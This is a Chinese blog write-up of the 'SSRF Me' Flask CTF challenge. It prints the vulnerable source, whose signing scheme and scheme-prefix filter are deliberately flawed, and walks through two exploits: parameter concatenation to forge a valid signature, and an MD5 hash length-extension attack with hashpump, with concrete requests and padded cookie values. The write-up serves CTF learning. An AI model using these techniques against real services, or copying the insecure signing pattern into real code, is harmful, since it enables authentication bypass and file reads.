SSRF Me(flask)
2019-10-02 12:10:00
python - ctf - flask - ssrf
一个源码阅读,这个是python的一个web框架,叫flask。
源码
#! /usr/bin/env python
#encoding=utf-8
from flask import Flask
from flask import request
import socket
import hashlib
import urllib
import sys
import os
import json
reload(sys)
sys.setdefaultencoding('latin1')
app = Flask(__name__)
secert_key = os.urandom(16)
class Task:
def __init__(self, action, param, sign, ip):
self.action = action
self.param = param
self.sign = sign
self.sandbox = md5(ip)
if(not os.path.exists(self.sandbox)): #SandBox For Remote_Addr
os.mkdir(self.sandbox)
def Exec(self):
result = {}
result['code'] = 500
if (self.checkSign()):
if "scan" in self.action:
tmpfile = open("./%s/result.txt" % self.sandbox, 'w')
resp = scan(self.param)
if (resp == "Connection Timeout"):
result['data'] = resp
else:
print resp
tmpfile.write(resp)
tmpfile.close()
result['code'] = 200
if "read" in self.action:
f = open("./%s/result.txt" % self.sandbox, 'r')
result['code'] = 200
result['data'] = f.read()
if result['code'] == 500:
result['data'] = "Action Error"
else:
result['code'] = 500
result['msg'] = "Sign Error"
return result
def checkSign(self):
if (getSign(self.action, self.param) == self.sign):
return True
else:
return False
#generate Sign For Action Scan.
@app.route("/geneSign", methods=['GET', 'POST'])
def geneSign():
param = urllib.unquote(request.args.get("param", ""))
action = "scan"
return getSign(action, param)
@app.route('/De1ta',methods=['GET','POST'])
def challenge():
action = urllib.unquote(request.cookies.get("action"))
param = urllib.unquote(request.args.get("param", ""))
sign = urllib.unquote(request.cookies.get("sign"))
ip = request.remote_addr
if(waf(param)):
return "No Hacker!!!!"
task = Task(action, param, sign, ip)
return json.dumps(task.Exec())
@app.route('/')
def index():
return open("code.txt","r").read()
def scan(param):
socket.setdefaulttimeout(1)
try:
return urllib.urlopen(param).read()[:50]
except:
return "Connection Timeout"
def getSign(action, param):
return hashlib.md5(secert_key + param + action).hexdigest()
def md5(content):
return hashlib.md5(content).hexdigest()
def waf(param):
check=param.strip().lower()
if check.startswith("gopher") or check.startswith("file"):
return True
else:
return False
if __name__ == '__main__':
app.debug = False
app.run(host='0.0.0.0')思路
先看路径,有
- /geneSign
- /De1ta
- /index
整理一下思路:
1.访问/De1ta这个url,执行challenge()函数,需要给cookies设置action和sign,给url传param
def challenge():
action = urllib.unquote(request.cookies.get("action"))
param = urllib.unquote(request.args.get("param", ""))
sign = urllib.unquote(request.cookies.get("sign"))
ip = request.remote_addr
if(waf(param)):
return "No Hacker!!!!"
task = Task(action, param, sign, ip)
return json.dumps(task.Exec())2.challenge()会将这些传给一个Task对象,然后执行Exec()
def Exec(self):
result = {}
result['code'] = 500
if (self.checkSign()):
if "scan" in self.action:
tmpfile = open("./%s/result.txt" % self.sandbox, 'w')
resp = scan(self.param)
if (resp == "Connection Timeout"):
result['data'] = resp
else:
print resp
tmpfile.write(resp)
tmpfile.close()
result['code'] = 200
if "read" in self.action:
f = open("./%s/result.txt" % self.sandbox, 'r')
result['code'] = 200
result['data'] = f.read()
if result['code'] == 500:
result['data'] = "Action Error"
else:
result['code'] = 500
result['msg'] = "Sign Error"
return result3.Exec()会执行checkSign(),checkSign()会执行getSign()
def checkSign(self):
if (getSign(self.action, self.param) == self.sign):
return True
else:
return False4.getSign()会secert_key + param + action进行加密后返回,当这个返回值等于sign时即可
def getSign(action, param):
return hashlib.md5(secert_key + param + action).hexdigest()5.访问/geneSign这个url会执行geneSign()和返回getSign()而它已经把action = "scan"指定了,所以我们只能在param上做文章。
@app.route("/geneSign", methods=['GET', 'POST'])
def geneSign():
param = urllib.unquote(request.args.get("param", ""))
action = "scan"
return getSign(action, param)6.为什么要做文章,因为Exec()中会对action进行判断,我们需要令action中同时有read和scan,但这里已经限定了action="scan",所以我们需要在param传值时尾部再增加一个read。
解题
方法一:
中规中矩按步骤即可getflag
- 先访问
/geneSign?param=flag.txtread取得sign=ebd2ea765b49b20beef3faefdd9b30bf - 访问
/De1ta?param=flag.txt - 传入
action=readscan;sign=ebd2ea765b49b20beef3faefdd9b30bf作为cookie
{"code": 200, "data": "flag{dfdd3b97-e1c3-45ec-a9c6-95e3f8d59715}\n"}
方法二:
- 访问
/geneSign?param=flag.txt取得sign=38a9e9012b331e9100bf6805d9e1db9d - 再访问
/De1ta?param=flag.txt action=scan%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%e0%00%00%00%00%00%00%00read;sign=73f8d9f96425377f56f05c594655682f作为cookie
这个操作称为哈希扩展攻击。
使用hashpump:
前面有提示secert_key = os.urandom(16)
然后将上面一行输出作为sign,下面一行替换掉\x->%作为action,即可getflag
本文原创于HhhM的博客,转载请标明出处。
近期动态
2020年11月4日 22:12
被项目压迫:),博客佛系更新....
一个web狗的博客
程序猿 CTFer Python Java Php 努力学习ing!!!
标签云
二叉树 算法 java 沙箱逃逸 python ctf sql 国赛强网杯 wp 省赛强网杯 flask ssrf sqlite roar 海啸杯 红帽杯 代码审计 php 反序列化 thinkphp phar 图床 lsb加密 取证分析 session 文件操作 注解 反射 servlet web BJDCTF mrctf Midnight TG:Hack HackZone bbctf hfctf 安恒 De1CTF 网鼎 GKCTF 渗透 PHPMailer SUID UDF DozerCTF cs 域渗透 dasctf 3kctf wmctf 特性 nodejs ciscn qwb 羊城杯 西湖论剑 appsec_il 漏洞学习 redis 祥云杯
_ _ _ _ ___ ___
| | | | | | | | \/ |
| |_| | |__ | |__ | . . |
| _ | '_ \| '_ \| |\/| |
| | | | | | | | | | | | |
\_| |_/_| |_|_| |_\_| |_/